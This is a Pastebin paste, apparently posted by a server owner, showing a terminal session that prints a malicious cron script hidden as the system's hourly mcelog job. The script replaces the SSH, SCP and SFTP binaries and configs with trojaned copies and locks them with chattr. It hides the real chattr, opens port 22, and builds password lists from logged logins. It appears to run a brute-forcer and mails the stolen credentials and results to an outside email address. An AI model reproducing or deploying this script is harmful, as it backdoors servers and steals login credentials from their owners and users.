API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jan 15th, 2017
168
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.35 KB | None | 0 0
raw download clone embed print report
  1. [sasha@mikbill ~]$ cat /etc/cron.hourly/mcelog
  2. #!/bin/bash
  3. #!!!!!!!!!!!!!!!!!!!!!!!!!Oh...and if u want to secure your network contact me @ aliahmet3303@gmail.com!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!#
  4. sed -i 's,/etc/cron.hourly/mcelog,/tmp/xREFasdcF,g' /var/spool/mail/root
  5. plm=`strings /usr/sbin/sshd |grep /var/html/lol`
  6. #ps=`ps x|grep mcelog`
  7. if [ "$plm" != "" ]
  8. then
  9. echo
  10. else
  11. if [ "`ps x|grep mcelog|grep -v mcelog`" != "" ]
  12. then
  13. echo
  14. else
  15. chattr -suia /usr/bin/ssh
  16. chattr -suia /usr/bin/sftp
  17. chattr -suia /usr/sbin/sshd
  18. chattr -suia /usr/bin/scp
  19. mv /usr/bin/ssh /etc/rpm
  20. mv /usr/bin/sftp /etc/rpm
  21. mv /usr/sbin/sshd /etc/rpm
  22. mv /usr/bin/scp /etc/rpm
  23. rm -rf /etc/ssh/sshd_config
  24. rm -rf /etc/ssh/ssh_config
  25. cp /usr/include/linux/pam/ssh_config /etc/ssh/ssh_config
  26. cp /usr/include/linux/pam/sshd_config /etc/ssh/sshd_config
  27. cp /usr/include/linux/pam/ssh /usr/bin/ssh
  28. cp /usr/include/linux/pam/sshd /usr/sbin/sshd
  29. cp /usr/include/linux/pam/scp /usr/bin/scp
  30. cp /usr/include/linux/pam/sftp /usr/bin/sftp
  31. chattr +ia /usr/bin/ssh
  32. chattr +ia /usr/bin/sftp
  33. chattr +ia /usr/sbin/sshd
  34. chattr +ia /usr/bin/scp
  35. mv /usr/bin/chattr /usr/include/linux/.xterm
  36. /usr/include/linux/.xterm +ia /usr/include/linux/.xterm
  37. mv /usr/include/linux/pam/chattr /usr/bin/chattr
  38. /usr/include/linux/.xterm +ia /usr/bin/chattr
  39. /sbin/iptables -A INPUT -p tcp --dport 22 -j ACCEPT
  40. /usr/include/linux/libcrypto.b
  41. /usr/sbin/sshd
  42. fi
  43. if [ -f /etc/init.d/sshd ] ;then
  44. /etc/init.d/sshd restart
  45. fi
  46. if [ -f /etc/init.d/ssh ] ;then
  47. /etc/init.d/ssh restart
  48. fi
  49. fi
  50.  
  51. /usr/sbin/rd /var/html/lol | grep SSH2_OUT > /etc/.temp
  52. if [ -s /etc/.temp ] ; then cat /etc/.temp | mail -s "SSH2 detected" aliahmet3303@gmail.com >> /dev/null ; else echo ; fi
  53. rm -rf /etc/.temp >> /dev/null
  54. cd /etc
  55. cat /var/html/lol >> /var/html/.all
  56. /usr/sbin/rd /var/html/lol|awk -F" " '{print $2}'|sort -u > mfu.txt
  57. echo "root xxx" > pass_file
  58. /usr/sbin/rd /var/html/lol|awk -F" " '{print $4" "$6}'|sort -u > pass_file
  59. /etc/bash 200
  60. #rm -rf mfu.txt
  61.  
  62. if [ -s vuln.txt ] ; then cat vuln.txt|grep -v DUP|grep -v xxx|mail -s 'gosh' aliahmet3303@gmail.com
  63. cat vuln.txt|grep -v DUP|grep -v xxx >> /var/html/.global ; fi
  64. rm -rf /var/html/lol vuln.txt mfu.txt pass_file
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!